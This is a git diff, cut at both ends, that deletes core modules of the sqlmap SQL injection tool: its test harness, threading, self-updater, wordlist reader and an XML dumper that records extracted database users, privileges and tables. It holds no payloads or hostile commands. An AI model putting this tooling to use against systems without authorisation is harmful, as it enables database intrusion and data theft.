_createDumpDir() - _createFilesDir() - _configureDumper() - -def _restoreMergedOptions(): - """ - Restore merged options (command line, configuration file and default values) - that could be possibly changed during the testing of previous target. 
- """ - - for option in RESTORE_MERGED_OPTIONS: - conf[option] = mergedOptions[option] - -def initTargetEnv(): - """ - Initialize target environment. - """ - - if conf.multipleTargets: - if conf.hashDB: - conf.hashDB.close() - - if conf.cj: - resetCookieJar(conf.cj) - - conf.paramDict = {} - conf.parameters = {} - conf.hashDBFile = None - - _setKnowledgeBaseAttributes(False) - _restoreMergedOptions() - _setDBMS() - - if conf.data: - class _(unicode): - pass - - kb.postUrlEncode = True - - for key, value in conf.httpHeaders: - if key.upper() == HTTP_HEADER.CONTENT_TYPE.upper(): - kb.postUrlEncode = "urlencoded" in value - break - - if kb.postUrlEncode: - original = conf.data - conf.data = _(urldecode(conf.data)) - setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original) - kb.postSpaceToPlus = '+' in original - -def setupTargetEnv(): - _createTargetDirs() - _setRequestParams() - _setHashDB() - _resumeHashDBValues() - _setResultsFile() - _setAuthCred() diff --git a/lib/core/testing.py b/lib/core/testing.py deleted file mode 100644 index bef22351..00000000 --- a/lib/core/testing.py +++ /dev/null @@ -1,322 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import codecs -import doctest -import os -import re -import shutil -import sys -import tempfile -import time -import traceback - -from extra.beep.beep import beep -from lib.controller.controller import start -from lib.core.common import clearConsoleLine -from lib.core.common import dataToStdout -from lib.core.common import getUnicode -from lib.core.common import randomStr -from lib.core.common import readXmlFile -from lib.core.data import conf -from lib.core.data import logger -from lib.core.data import paths -from lib.core.exception import SqlmapBaseException -from lib.core.exception import SqlmapNotVulnerableException -from lib.core.log import LOGGER_HANDLER -from lib.core.option import init -from 
lib.core.option import initOptions -from lib.core.option import setVerbosity -from lib.core.optiondict import optDict -from lib.core.settings import UNICODE_ENCODING -from lib.parse.cmdline import cmdLineParser - -class Failures(object): - failedItems = None - failedParseOn = None - failedTraceBack = None - -def smokeTest(): - """ - Runs the basic smoke testing of a program - """ - - retVal = True - count, length = 0, 0 - - for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): - if any(_ in root for _ in ("thirdparty", "extra")): - continue - - for ifile in files: - length += 1 - - for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): - if any(_ in root for _ in ("thirdparty", "extra")): - continue - - for ifile in files: - if os.path.splitext(ifile)[1].lower() == ".py" and ifile != "__init__.py": - path = os.path.join(root, os.path.splitext(ifile)[0]) - path = path.replace(paths.SQLMAP_ROOT_PATH, '.') - path = path.replace(os.sep, '.').lstrip('.') - try: - __import__(path) - module = sys.modules[path] - except Exception, msg: - retVal = False - dataToStdout("\r") - errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, ifile), msg) - logger.error(errMsg) - else: - # Run doc tests - # Reference: http://docs.python.org/library/doctest.html - (failure_count, test_count) = doctest.testmod(module) - if failure_count > 0: - retVal = False - - count += 1 - status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) - dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) - - clearConsoleLine() - if retVal: - logger.info("smoke test final result: PASSED") - else: - logger.error("smoke test final result: FAILED") - - return retVal - -def adjustValueType(tagName, value): - for family in optDict.keys(): - for name, type_ in optDict[family].items(): - if type(type_) == tuple: - type_ = type_[0] - if tagName == name: - if type_ == "boolean": - value = (value == "True") - elif type_ == "integer": - value = 
int(value) - elif type_ == "float": - value = float(value) - break - return value - -def liveTest(): - """ - Runs the test of a program against the live testing environment - """ - - retVal = True - count = 0 - global_ = {} - vars_ = {} - - livetests = readXmlFile(paths.LIVE_TESTS_XML) - length = len(livetests.getElementsByTagName("case")) - - element = livetests.getElementsByTagName("global") - if element: - for item in element: - for child in item.childNodes: - if child.nodeType == child.ELEMENT_NODE and child.hasAttribute("value"): - global_[child.tagName] = adjustValueType(child.tagName, child.getAttribute("value")) - - element = livetests.getElementsByTagName("vars") - if element: - for item in element: - for child in item.childNodes: - if child.nodeType == child.ELEMENT_NODE and child.hasAttribute("value"): - var = child.getAttribute("value") - vars_[child.tagName] = randomStr(6) if var == "random" else var - - for case in livetests.getElementsByTagName("case"): - parse_from_console_output = False - count += 1 - name = None - parse = [] - switches = dict(global_) - value = "" - vulnerable = True - result = None - - if case.hasAttribute("name"): - name = case.getAttribute("name") - - if conf.runCase and ((conf.runCase.isdigit() and conf.runCase != count) or not re.search(conf.runCase, name, re.DOTALL)): - continue - - if case.getElementsByTagName("switches"): - for child in case.getElementsByTagName("switches")[0].childNodes: - if child.nodeType == child.ELEMENT_NODE and child.hasAttribute("value"): - value = replaceVars(child.getAttribute("value"), vars_) - switches[child.tagName] = adjustValueType(child.tagName, value) - - if case.getElementsByTagName("parse"): - for item in case.getElementsByTagName("parse")[0].getElementsByTagName("item"): - if item.hasAttribute("value"): - value = replaceVars(item.getAttribute("value"), vars_) - - if item.hasAttribute("console_output"): - parse_from_console_output = bool(item.getAttribute("console_output")) - - 
parse.append((value, parse_from_console_output)) - - conf.verbose = global_.get("verbose", 1) - setVerbosity() - - msg = "running live test case: %s (%d/%d)" % (name, count, length) - logger.info(msg) - - initCase(switches, count) - - test_case_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "test_case"), "wb", UNICODE_ENCODING) - test_case_fd.write("%s\n" % name) - - try: - result = runCase(parse) - except SqlmapNotVulnerableException: - vulnerable = False - finally: - conf.verbose = global_.get("verbose", 1) - setVerbosity() - - if result is True: - logger.info("test passed") - cleanCase() - else: - errMsg = "test failed" - - if Failures.failedItems: - errMsg += " at parsing items: %s" % ", ".join(i for i in Failures.failedItems) - - errMsg += " - scan folder: %s" % paths.SQLMAP_OUTPUT_PATH - errMsg += " - traceback: %s" % bool(Failures.failedTraceBack) - - if not vulnerable: - errMsg += " - SQL injection not detected" - - logger.error(errMsg) - test_case_fd.write("%s\n" % errMsg) - - if Failures.failedParseOn: - console_output_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "console_output"), "wb", UNICODE_ENCODING) - console_output_fd.write(Failures.failedParseOn) - console_output_fd.close() - - if Failures.failedTraceBack: - traceback_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "traceback"), "wb", UNICODE_ENCODING) - traceback_fd.write(Failures.failedTraceBack) - traceback_fd.close() - - beep() - - if conf.stopFail is True: - return retVal - - test_case_fd.close() - retVal &= bool(result) - - dataToStdout("\n") - - if retVal: - logger.info("live test final result: PASSED") - else: - logger.error("live test final result: FAILED") - - return retVal - -def initCase(switches, count): - Failures.failedItems = [] - Failures.failedParseOn = None - Failures.failedTraceBack = None - - paths.SQLMAP_OUTPUT_PATH = tempfile.mkdtemp(prefix="sqlmaptest-%d-" % count) - paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump") - 
paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files") - - logger.debug("using output directory '%s' for this test case" % paths.SQLMAP_OUTPUT_PATH) - - LOGGER_HANDLER.stream = sys.stdout = tempfile.SpooledTemporaryFile(max_size=0, mode="w+b", prefix="sqlmapstdout-") - - cmdLineOptions = cmdLineParser() - - if switches: - for key, value in switches.items(): - if key in cmdLineOptions.__dict__: - cmdLineOptions.__dict__[key] = value - - initOptions(cmdLineOptions, True) - init() - -def cleanCase(): - shutil.rmtree(paths.SQLMAP_OUTPUT_PATH, True) - -def runCase(parse): - retVal = True - handled_exception = None - unhandled_exception = None - result = False - console = "" - - try: - result = start() - except KeyboardInterrupt: - pass - except SqlmapBaseException, e: - handled_exception = e - except Exception, e: - unhandled_exception = e - finally: - sys.stdout.seek(0) - console = sys.stdout.read() - LOGGER_HANDLER.stream = sys.stdout = sys.__stdout__ - - if unhandled_exception: - Failures.failedTraceBack = "unhandled exception: %s" % str(traceback.format_exc()) - retVal = None - elif handled_exception: - Failures.failedTraceBack = "handled exception: %s" % str(traceback.format_exc()) - retVal = None - elif result is False: # this means no SQL injection has been detected - if None, ignore - retVal = False - - console = getUnicode(console, encoding=sys.stdin.encoding) - - if parse and retVal: - with codecs.open(conf.dumper.getOutputFile(), "rb", UNICODE_ENCODING) as f: - content = f.read() - - for item, parse_from_console_output in parse: - parse_on = console if parse_from_console_output else content - - if item.startswith("r'") and item.endswith("'"): - if not re.search(item[2:-1], parse_on, re.DOTALL): - retVal = None - Failures.failedItems.append(item) - - elif item not in parse_on: - retVal = None - Failures.failedItems.append(item) - - if Failures.failedItems: - Failures.failedParseOn = console - - elif retVal is False: - 
Failures.failedParseOn = console - - return retVal - -def replaceVars(item, vars_): - retVal = item - - if item and vars_: - for var in re.findall("\$\{([^}]+)\}", item): - if var in vars_: - retVal = retVal.replace("${%s}" % var, vars_[var]) - - return retVal diff --git a/lib/core/threads.py b/lib/core/threads.py deleted file mode 100644 index 4fa68bfb..00000000 --- a/lib/core/threads.py +++ /dev/null @@ -1,209 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import difflib -import threading -import time -import traceback - -from thread import error as ThreadError - -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.datatype import AttribDict -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapThreadException -from lib.core.exception import SqlmapValueException -from lib.core.settings import MAX_NUMBER_OF_THREADS -from lib.core.settings import PYVERSION - -shared = AttribDict() - -class _ThreadData(threading.local): - """ - Represents thread independent data - """ - - def __init__(self): - self.reset() - - def reset(self): - """ - Resets thread data model - """ - - self.disableStdOut = False - self.hashDBCursor = None - self.inTransaction = False - self.lastComparisonPage = None - self.lastComparisonHeaders = None - self.lastErrorPage = None - self.lastHTTPError = None - self.lastRedirectMsg = None - self.lastQueryDuration = 0 - self.lastPage = None - self.lastRequestMsg = None - self.lastRequestUID = 0 - self.lastRedirectURL = None - self.resumed = False - self.retriesCount = 0 - self.seqMatcher = difflib.SequenceMatcher(None) - self.shared = shared - self.valueStack = [] - -ThreadData = _ThreadData() - -def getCurrentThreadUID(): - return hash(threading.currentThread()) - -def readInput(message, default=None): - # 
It will be overwritten by original from lib.core.common - pass - -def getCurrentThreadData(): - """ - Returns current thread's local data - """ - - global ThreadData - - return ThreadData - -def getCurrentThreadName(): - """ - Returns current's thread name - """ - - return threading.current_thread().getName() - -def exceptionHandledFunction(threadFunction): - try: - threadFunction() - except KeyboardInterrupt: - kb.threadContinue = False - kb.threadException = True - raise - except Exception, ex: - # thread is just going to be silently killed - logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message)) - -def setDaemon(thread): - # Reference: http://stackoverflow.com/questions/190010/daemon-threads-explanation - if PYVERSION >= "2.6": - thread.daemon = True - else: - thread.setDaemon(True) - -def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardException=True, threadChoice=False, startThreadMsg=True): - threads = [] - - kb.multiThreadMode = True - kb.threadContinue = True - kb.threadException = False - - if threadChoice and numThreads == 1 and not (kb.injection.data and not any(_ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in kb.injection.data)): - while True: - message = "please enter number of threads? [Enter for %d (current)] " % numThreads - choice = readInput(message, default=str(numThreads)) - if choice: - skipThreadCheck = False - if choice.endswith('!'): - choice = choice[:-1] - skipThreadCheck = True - if choice.isdigit(): - if int(choice) > MAX_NUMBER_OF_THREADS and not skipThreadCheck: - errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS - logger.critical(errMsg) - else: - conf.threads = numThreads = int(choice) - break - - if numThreads == 1: - warnMsg = "running in a single-thread mode. 
This could take a while" - logger.warn(warnMsg) - - try: - if numThreads > 1: - if startThreadMsg: - infoMsg = "starting %d threads" % numThreads - logger.info(infoMsg) - else: - threadFunction() - return - - # Start the threads - for numThread in xrange(numThreads): - thread = threading.Thread(target=exceptionHandledFunction, name=str(numThread), args=[threadFunction]) - - setDaemon(thread) - - try: - thread.start() - except ThreadError, ex: - errMsg = "error occurred while starting new thread ('%s')" % ex.message - logger.critical(errMsg) - break - - threads.append(thread) - - # And wait for them to all finish - alive = True - while alive: - alive = False - for thread in threads: - if thread.isAlive(): - alive = True - time.sleep(0.1) - - except KeyboardInterrupt: - print - kb.threadContinue = False - kb.threadException = True - - if numThreads > 1: - logger.info("waiting for threads to finish (Ctrl+C was pressed)") - try: - while (threading.activeCount() > 1): - pass - - except KeyboardInterrupt: - raise SqlmapThreadException("user aborted (Ctrl+C was pressed multiple times)") - - if forwardException: - raise - - except (SqlmapConnectionException, SqlmapValueException), ex: - print - kb.threadException = True - logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message)) - - except: - from lib.core.common import unhandledExceptionMessage - - print - kb.threadException = True - errMsg = unhandledExceptionMessage() - logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) - traceback.print_exc() - - finally: - kb.multiThreadMode = False - kb.bruteMode = False - kb.threadContinue = True - kb.threadException = False - - for lock in kb.locks.values(): - if lock.locked_lock(): - lock.release() - - if conf.get("hashDB"): - conf.hashDB.flush(True) - - if cleanupFunction: - cleanupFunction() diff --git a/lib/core/unescaper.py b/lib/core/unescaper.py deleted file mode 100644 index 3af78f92..00000000 --- a/lib/core/unescaper.py 
+++ /dev/null @@ -1,34 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.data import conf -from lib.core.datatype import AttribDict -from lib.core.settings import EXCLUDE_UNESCAPE - -class Unescaper(AttribDict): - def escape(self, expression, quote=True, dbms=None): - if conf.noEscape: - return expression - - if expression is None: - return expression - - for exclude in EXCLUDE_UNESCAPE: - if exclude in expression: - return expression - - identifiedDbms = Backend.getIdentifiedDbms() - - if dbms is not None: - return self[dbms](expression, quote=quote) - elif identifiedDbms is not None: - return self[identifiedDbms](expression, quote=quote) - else: - return expression - -unescaper = Unescaper() diff --git a/lib/core/update.py b/lib/core/update.py deleted file mode 100644 index 9be92a53..00000000 --- a/lib/core/update.py +++ /dev/null @@ -1,77 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re -import time - -from subprocess import PIPE -from subprocess import Popen as execute - -from lib.core.common import dataToStdout -from lib.core.common import getSafeExString -from lib.core.common import pollProcess -from lib.core.data import conf -from lib.core.data import logger -from lib.core.data import paths -from lib.core.revision import getRevisionNumber -from lib.core.settings import GIT_REPOSITORY -from lib.core.settings import IS_WIN - -def update(): - if not conf.updateAll: - return - - success = False - - if not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, ".git")): - errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository " - errMsg += "from GitHub (e.g. 
'git clone https://github.com/sqlmapproject/sqlmap.git sqlmap')" - logger.error(errMsg) - else: - infoMsg = "updating sqlmap to the latest development version from the " - infoMsg += "GitHub repository" - logger.info(infoMsg) - - debugMsg = "sqlmap will try to update itself using 'git' command" - logger.debug(debugMsg) - - dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X")) - - try: - process = execute("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE, cwd=paths.SQLMAP_ROOT_PATH) - pollProcess(process, True) - stdout, stderr = process.communicate() - success = not process.returncode - except (IOError, OSError), ex: - success = False - stderr = getSafeExString(ex) - - if success: - import lib.core.settings - _ = lib.core.settings.REVISION = getRevisionNumber() - logger.info("%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", _)) - else: - if "Not a git repository" in stderr: - errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository " - errMsg += "from GitHub (e.g. 
'git clone https://github.com/sqlmapproject/sqlmap.git sqlmap')" - logger.error(errMsg) - else: - logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip()) - - if not success: - if IS_WIN: - infoMsg = "for Windows platform it's recommended " - infoMsg += "to use a GitHub for Windows client for updating " - infoMsg += "purposes (http://windows.github.com/) or just " - infoMsg += "download the latest snapshot from " - infoMsg += "https://github.com/sqlmapproject/sqlmap/downloads" - else: - infoMsg = "for Linux platform it's required " - infoMsg += "to install a standard 'git' package (e.g.: 'sudo apt-get install git')" - - logger.info(infoMsg) diff --git a/lib/core/wordlist.py b/lib/core/wordlist.py deleted file mode 100644 index 13e763b1..00000000 --- a/lib/core/wordlist.py +++ /dev/null @@ -1,87 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import zipfile - -from lib.core.common import getSafeExString -from lib.core.exception import SqlmapDataException -from lib.core.exception import SqlmapInstallationException -from lib.core.settings import UNICODE_ENCODING - -class Wordlist(object): - """ - Iterator for looping over a large dictionaries - """ - - def __init__(self, filenames, proc_id=None, proc_count=None, custom=None): - self.filenames = filenames - self.fp = None - self.index = 0 - self.counter = -1 - self.current = None - self.iter = None - self.custom = custom or [] - self.proc_id = proc_id - self.proc_count = proc_count - self.adjust() - - def __iter__(self): - return self - - def adjust(self): - self.closeFP() - if self.index > len(self.filenames): - raise StopIteration - elif self.index == len(self.filenames): - self.iter = iter(self.custom) - else: - self.current = self.filenames[self.index] - if os.path.splitext(self.current)[1].lower() == ".zip": - try: - _ = zipfile.ZipFile(self.current, 'r') - 
except zipfile.error, ex: - errMsg = "something seems to be wrong with " - errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex)) - errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg - if len(_.namelist()) == 0: - errMsg = "no file(s) inside '%s'" % self.current - raise SqlmapDataException(errMsg) - self.fp = _.open(_.namelist()[0]) - else: - self.fp = open(self.current, 'r') - self.iter = iter(self.fp) - - self.index += 1 - - def closeFP(self): - if self.fp: - self.fp.close() - self.fp = None - - def next(self): - retVal = None - while True: - self.counter += 1 - try: - retVal = self.iter.next().rstrip() - except zipfile.error, ex: - errMsg = "something seems to be wrong with " - errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex)) - errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg - except StopIteration: - self.adjust() - retVal = self.iter.next().rstrip() - if not self.proc_count or self.counter % self.proc_count == self.proc_id: - break - return retVal - - def rewind(self): - self.index = 0 - self.adjust() diff --git a/lib/core/xmldump.py b/lib/core/xmldump.py deleted file mode 100644 index e0c37796..00000000 --- a/lib/core/xmldump.py +++ /dev/null @@ -1,536 +0,0 @@ -#!/usr/bin/env python - -import codecs -import os -import re -import xml - -import xml.sax.saxutils as saxutils - -from lib.core.common import getUnicode -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.exception import SqlmapFilePathException -from lib.core.settings import UNICODE_ENCODING -from thirdparty.prettyprint import prettyprint -from xml.dom.minidom import Document -from xml.parsers.expat import ExpatError - -TECHNIC_ELEM_NAME = "Technic" -TECHNICS_ELEM_NAME = "Technics" -BANNER_ELEM_NAME = "Banner" -COLUMNS_ELEM_NAME = "DatabaseColumns" -COLUMN_ELEM_NAME = "Column" 
-CELL_ELEM_NAME = "Cell" -COLUMN_ATTR = "column" -ROW_ELEM_NAME = "Row" -TABLES_ELEM_NAME = "tables" -DATABASE_COLUMNS_ELEM = "DB" -DB_TABLES_ELEM_NAME = "DBTables" -DB_TABLE_ELEM_NAME = "DBTable" -IS_DBA_ELEM_NAME = "isDBA" -FILE_CONTENT_ELEM_NAME = "FileContent" -DB_ATTR = "db" -UNKNOWN_COLUMN_TYPE = "unknown" -USER_SETTINGS_ELEM_NAME = "UserSettings" -USER_SETTING_ELEM_NAME = "UserSetting" -USERS_ELEM_NAME = "Users" -USER_ELEM_NAME = "User" -DB_USER_ELEM_NAME = "DBUser" -SETTINGS_ELEM_NAME = "Settings" -DBS_ELEM_NAME = "DBs" -DB_NAME_ELEM_NAME = "DBName" -DATABASE_ELEM_NAME = "Database" -TABLE_ELEM_NAME = "Table" -DB_TABLE_VALUES_ELEM_NAME = "DBTableValues" -DB_VALUES_ELEM = "DBValues" -QUERIES_ELEM_NAME = "Queries" -QUERY_ELEM_NAME = "Query" -REGISTERY_ENTRIES_ELEM_NAME = "RegistryEntries" -REGISTER_DATA_ELEM_NAME = "RegisterData" -DEFAULT_DB = "All" -MESSAGE_ELEM = "Message" -MESSAGES_ELEM_NAME = "Messages" -ERROR_ELEM_NAME = "Error" -LST_ELEM_NAME = "List" -LSTS_ELEM_NAME = "Lists" -CURRENT_USER_ELEM_NAME = "CurrentUser" -CURRENT_DB_ELEM_NAME = "CurrentDB" -MEMBER_ELEM = "Member" -ADMIN_USER = "Admin" -REGULAR_USER = "User" -STATUS_ELEM_NAME = "Status" -RESULTS_ELEM_NAME = "Results" -UNHANDLED_PROBLEM_TYPE = "Unhandled" -NAME_ATTR = "name" -TYPE_ATTR = "type" -VALUE_ATTR = "value" -SUCESS_ATTR = "success" -NAME_SPACE_ATTR = 'http://www.w3.org/2001/XMLSchema-instance' -XMLNS_ATTR = "xmlns:xsi" -SCHEME_NAME = "sqlmap.xsd" -SCHEME_NAME_ATTR = "xsi:noNamespaceSchemaLocation" -CHARACTERS_TO_ENCODE = range(32) + range(127, 256) -ENTITIES = {'"': '"', "'": "'"} - -class XMLDump(object): - ''' - This class purpose is to dump the data into an xml Format. 
- The format of the xml file is described in the scheme file xml/sqlmap.xsd - ''' - - def __init__(self): - self._outputFile = None - self._outputFP = None - self.__root = None - self.__doc = Document() - - def _addToRoot(self, element): - ''' - Adds element to the root element - ''' - self.__root.appendChild(element) - - def __write(self, data, n=True): - ''' - Writes the data into the file - ''' - if n: - self._outputFP.write("%s\n" % data) - else: - self._outputFP.write("%s " % data) - - self._outputFP.flush() - - kb.dataOutputFlag = True - - def _getRootChild(self, elemName): - ''' - Returns the child of the root with the described name - ''' - elements = self.__root.getElementsByTagName(elemName) - if elements: - return elements[0] - - return elements - - def _createTextNode(self, data): - ''' - Creates a text node with utf8 data inside. - The text is escaped to an fit the xml text Format. - ''' - if data is None: - return self.__doc.createTextNode(u'') - else: - escaped_data = saxutils.escape(data, ENTITIES) - return self.__doc.createTextNode(escaped_data) - - def _createAttribute(self, attrName, attrValue): - ''' - Creates an attribute node with utf8 data inside. - The text is escaped to an fit the xml text Format. - ''' - attr = self.__doc.createAttribute(attrName) - if attrValue is None: - attr.nodeValue = u'' - else: - attr.nodeValue = getUnicode(attrValue) - return attr - - def string(self, header, data, sort=True): - ''' - Adds string element to the xml. 
- ''' - if isinstance(data, (list, tuple, set)): - self.lister(header, data, sort) - return - - messagesElem = self._getRootChild(MESSAGES_ELEM_NAME) - if (not(messagesElem)): - messagesElem = self.__doc.createElement(MESSAGES_ELEM_NAME) - self._addToRoot(messagesElem) - - if data: - data = self._formatString(data) - else: - data = "" - - elem = self.__doc.createElement(MESSAGE_ELEM) - elem.setAttributeNode(self._createAttribute(TYPE_ATTR, header)) - elem.appendChild(self._createTextNode(data)) - messagesElem.appendChild(elem) - - def lister(self, header, elements, sort=True): - ''' - Adds information formatted as list element - ''' - lstElem = self.__doc.createElement(LST_ELEM_NAME) - lstElem.setAttributeNode(self._createAttribute(TYPE_ATTR, header)) - if elements: - if sort: - try: - elements = set(elements) - elements = list(elements) - elements.sort(key=lambda x: x.lower()) - except: - pass - - for element in elements: - memberElem = self.__doc.createElement(MEMBER_ELEM) - lstElem.appendChild(memberElem) - if isinstance(element, basestring): - memberElem.setAttributeNode(self._createAttribute(TYPE_ATTR, "string")) - memberElem.appendChild(self._createTextNode(element)) - elif isinstance(element, (list, tuple, set)): - memberElem.setAttributeNode(self._createAttribute(TYPE_ATTR, "list")) - for e in element: - memberElemStr = self.__doc.createElement(MEMBER_ELEM) - memberElemStr.setAttributeNode(self._createAttribute(TYPE_ATTR, "string")) - memberElemStr.appendChild(self._createTextNode(getUnicode(e))) - memberElem.appendChild(memberElemStr) - listsElem = self._getRootChild(LSTS_ELEM_NAME) - if not(listsElem): - listsElem = self.__doc.createElement(LSTS_ELEM_NAME) - self._addToRoot(listsElem) - listsElem.appendChild(lstElem) - - def technic(self, technicType, data): - ''' - Adds information about the technic used to extract data from the db - ''' - technicElem = self.__doc.createElement(TECHNIC_ELEM_NAME) - 
technicElem.setAttributeNode(self._createAttribute(TYPE_ATTR, technicType)) - textNode = self._createTextNode(data) - technicElem.appendChild(textNode) - technicsElem = self._getRootChild(TECHNICS_ELEM_NAME) - if not(technicsElem): - technicsElem = self.__doc.createElement(TECHNICS_ELEM_NAME) - self._addToRoot(technicsElem) - technicsElem.appendChild(technicElem) - - def banner(self, data): - ''' - Adds information about the database banner to the xml. - The banner contains information about the type and the version of the database. - ''' - bannerElem = self.__doc.createElement(BANNER_ELEM_NAME) - bannerElem.appendChild(self._createTextNode(data)) - self._addToRoot(bannerElem) - - def currentUser(self, data): - ''' - Adds information about the current database user to the xml - ''' - currentUserElem = self.__doc.createElement(CURRENT_USER_ELEM_NAME) - textNode = self._createTextNode(data) - currentUserElem.appendChild(textNode) - self._addToRoot(currentUserElem) - - def currentDb(self, data): - ''' - Adds information about the current database is use to the xml - ''' - currentDBElem = self.__doc.createElement(CURRENT_DB_ELEM_NAME) - textNode = self._createTextNode(data) - currentDBElem.appendChild(textNode) - self._addToRoot(currentDBElem) - - def dba(self, isDBA): - ''' - Adds information to the xml that indicates whether the user has DBA privileges - ''' - isDBAElem = self.__doc.createElement(IS_DBA_ELEM_NAME) - isDBAElem.setAttributeNode(self._createAttribute(VALUE_ATTR, getUnicode(isDBA))) - self._addToRoot(isDBAElem) - - def users(self, users): - ''' - Adds a list of the existing users to the xml - ''' - usersElem = self.__doc.createElement(USERS_ELEM_NAME) - if isinstance(users, basestring): - users = [users] - if users: - for user in users: - userElem = self.__doc.createElement(DB_USER_ELEM_NAME) - usersElem.appendChild(userElem) - userElem.appendChild(self._createTextNode(user)) - self._addToRoot(usersElem) - - def dbs(self, dbs): - ''' - Adds a list of the 
existing databases to the xml - ''' - dbsElem = self.__doc.createElement(DBS_ELEM_NAME) - if dbs: - for db in dbs: - dbElem = self.__doc.createElement(DB_NAME_ELEM_NAME) - dbsElem.appendChild(dbElem) - dbElem.appendChild(self._createTextNode(db)) - self._addToRoot(dbsElem) - - def userSettings(self, header, userSettings, subHeader): - ''' - Adds information about the user's settings to the xml. - The information can be user's passwords, privileges and etc.. - ''' - self._areAdmins = set() - userSettingsElem = self._getRootChild(USER_SETTINGS_ELEM_NAME) - if (not(userSettingsElem)): - userSettingsElem = self.__doc.createElement(USER_SETTINGS_ELEM_NAME) - self._addToRoot(userSettingsElem) - - userSettingElem = self.__doc.createElement(USER_SETTING_ELEM_NAME) - userSettingElem.setAttributeNode(self._createAttribute(TYPE_ATTR, header)) - - if isinstance(userSettings, (tuple, list, set)): - self._areAdmins = userSettings[1] - userSettings = userSettings[0] - - users = userSettings.keys() - users.sort(key=lambda x: x.lower()) - - for user in users: - userElem = self.__doc.createElement(USER_ELEM_NAME) - userSettingElem.appendChild(userElem) - if user in self._areAdmins: - userElem.setAttributeNode(self._createAttribute(TYPE_ATTR, ADMIN_USER)) - else: - userElem.setAttributeNode(self._createAttribute(TYPE_ATTR, REGULAR_USER)) - - settings = userSettings[user] - - settings.sort() - - for setting in settings: - settingsElem = self.__doc.createElement(SETTINGS_ELEM_NAME) - settingsElem.setAttributeNode(self._createAttribute(TYPE_ATTR, subHeader)) - settingTextNode = self._createTextNode(setting) - settingsElem.appendChild(settingTextNode) - userElem.appendChild(settingsElem) - userSettingsElem.appendChild(userSettingElem) - - def dbTables(self, dbTables): - ''' - Adds information of the existing db tables to the xml - ''' - if not isinstance(dbTables, dict): - self.string(TABLES_ELEM_NAME, dbTables) - return - - dbTablesElem = self.__doc.createElement(DB_TABLES_ELEM_NAME) - 
- for db, tables in dbTables.items(): - tables.sort(key=lambda x: x.lower()) - dbElem = self.__doc.createElement(DATABASE_ELEM_NAME) - dbElem.setAttributeNode(self._createAttribute(NAME_ATTR, db)) - dbTablesElem.appendChild(dbElem) - for table in tables: - tableElem = self.__doc.createElement(DB_TABLE_ELEM_NAME) - tableElem.appendChild(self._createTextNode(table)) - dbElem.appendChild(tableElem) - self._addToRoot(dbTablesElem) - - def dbTableColumns(self, tableColumns): - ''' - Adds information about the columns of the existing tables to the xml - ''' - - columnsElem = self._getRootChild(COLUMNS_ELEM_NAME) - if not(columnsElem): - columnsElem = self.__doc.createElement(COLUMNS_ELEM_NAME) - - for db, tables in tableColumns.items(): - if not db: - db = DEFAULT_DB - dbElem = self.__doc.createElement(DATABASE_COLUMNS_ELEM) - dbElem.setAttributeNode(self._createAttribute(NAME_ATTR, db)) - columnsElem.appendChild(dbElem) - - for table, columns in tables.items(): - tableElem = self.__doc.createElement(TABLE_ELEM_NAME) - tableElem.setAttributeNode(self._createAttribute(NAME_ATTR, table)) - - colList = columns.keys() - colList.sort(key=lambda x: x.lower()) - - for column in colList: - colType = columns[column] - colElem = self.__doc.createElement(COLUMN_ELEM_NAME) - if colType is not None: - colElem.setAttributeNode(self._createAttribute(TYPE_ATTR, colType)) - else: - colElem.setAttributeNode(self._createAttribute(TYPE_ATTR, UNKNOWN_COLUMN_TYPE)) - colElem.appendChild(self._createTextNode(column)) - tableElem.appendChild(colElem) - - 